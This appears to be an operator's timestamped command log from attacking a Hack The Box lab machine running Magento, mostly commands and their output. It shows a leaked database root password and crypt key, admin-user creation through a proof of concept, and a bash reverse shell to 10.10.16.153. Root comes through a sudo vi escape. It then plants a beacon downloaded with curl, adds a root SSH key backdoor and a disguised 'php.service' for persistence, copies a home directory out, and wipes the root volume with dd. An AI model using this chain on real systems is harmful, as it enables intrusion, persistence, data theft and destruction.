master
12025-04-06T06:56:22-04:00
2
3sudo apt install -y nmap curl python3-venv make zip unzip
4sudo openvpn --config htb.ovpn
5
6### T1 10.129.232.125
7
8ping -c 1 10.129.232.125
9nmap -sV -T4 10.129.232.125
10
11PORT STATE SERVICE VERSION
1222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
1380/tcp open http Apache httpd 2.4.29 ((Ubuntu))
14
15up, ports open
16
17magneto software
1810.129.232.125 swagshop.htb
19curl -L http://swagshop.htb/app/etc/local.xml
20
21
22python3 cli.py repl
23set --target 10.129.232.125
24
25 🏁 Done! Here's what we found:
26 Install Date: Wed, 08 May 2019 07:23:09 +0000
27 Hostname: localhost
28 Username: root
29 Password: fMVWh7bDHpgZkyfqQXreTjU9
30 Database Name: swagshop
31 Crypt Key: b355a9e0cd018d3f7f03607141518419
32
33python3 poc.py http://swagshop.htb
34create-user --username ypwq --password 123
35
36 🛶 Attempting to create a new user with the following creds:
37 username: ypwq
38 password: 123
39 🏁 Worked! Check 10.129.232.125/admin with creds ypwq:123
40 👉 Set username to ypwq and password to 123
41
422025-04-06T07:05:09-04:00
43
44python3 -m venv venv
45source venv/bin/activate
46python3 -m pip install mechanize
47nc -l -p 4444
48python3 exp.py http://swagshop.htb/index.php/admin "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.153/443 0>&1'"
492025-04-06T07:28:47-04:00
50
51sudo -l
52Matching Defaults entries for www-data on swagshop:
53 env_reset, mail_badpass,
54 secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
55
56User www-data may run the following commands on swagshop:
57 (root) NOPASSWD: /usr/bin/vi /var/www/html/*
58
59sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
60uid=0(root) gid=0(root) groups=0(root)
612025-04-06T07:29:51-04:00
62
63generate beacon --http http://10.10.16.153:4444 --seconds 20 --os linux
64http --lport 4444
65
66curl -s -L http://10.10.16.153:8080/php -o /usr/sbin/php
67chmod +x /usr/sbin/php
68/usr/sbin/php
692025-04-06T07:38:36-04:00
70
71root_rsa.pub
72ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDs7DvQgMbj9jJ7hsotTmY6yE8JEg4ky/vOqcKEG3HMCb019D8hE/xMgsIsne5tXK4PRu7P41M4Vgkl+CKqKU61bAimLo9FvG7Q6RTx0A1WpzejCr7MDna7h2UiahiNFU2cbVEiJxmdh1xTNB0WmZUeIJ8K9mFt0YACYK9ze382EUzH1rLJDxoDS9ahBThcHjK3aGcduHmQ+PQwa4rBzyt5FBArHT14BlZ8hwAw1X8VlY7+pDW+CzC1z6tJ81iXqKHE8r31WIeiIOAMZhKeSPBv/18bxi9bdVTk6MJ3HE6P9eiMYSP45maSJxdaQdx5kyCQSsCMzArUIyNSXnxK1sEGAtuPXwNCfp6M8BspHSPtVl0L83dQrvnd2ZyamBYK6skRNuU27nxmq5BVFa2Og0hmujvYnFniFCfCPjRAGl628Y/6nYs87xO0IrnM8WIUsGK0y+QESSr1sQN0SV2ETTHkSg49Omn5mV9bT9l5xEgM6xyVFyWrV/0dld+rUc24+As=
73
74mkdir /root/.ssh/
75upload /home/user/swag/2025-04-06/out/root_rsa.pub /root/.ssh/authorized_keys
76chmod /root/.ssh/authorized_keys 0400
77
78cat /etc/ssh/sshd_config
79#PermitRootLogin prohibit-password
80
81ssh -vvv root@10.129.232.125 -i out/root_rsa -T /bin/bash
822025-04-06T07:44:04-04:00
83
84mv /tmp/.php /usr/sbin/php
85
86php service
87 [Unit]
88 Description=php service
89 After=network.target
90
91 [Service]
92 Type=simple
93 Restart=always
94 RestartSec=1
95 ExecStart=/usr/sbin/php
96
97 [Install]
98 WantedBy=multi-user.target
99
100upload -o /home/user/swag/2025-04-06/out/php.service /lib/systemd/system/php.service
101execute systemctl daemon-reload
102execute systemctl enable php.service
103execute systemctl start php.service
1042025-04-06T07:48:54-04:00
105
106find
107download /home/haris/ -r
108
109/bin/dd if=/dev/zero of=/dev/mapper/swagshop--vg-root
110 2641 2415 root x86_64 /bin/dd
1112025-04-06T08:06:25-04:00
112
113terminate -F 1
1142025-04-06T08:12:04-04:00
115
116all processes and services non-responsive
1172025-04-06T08:20:52-04:00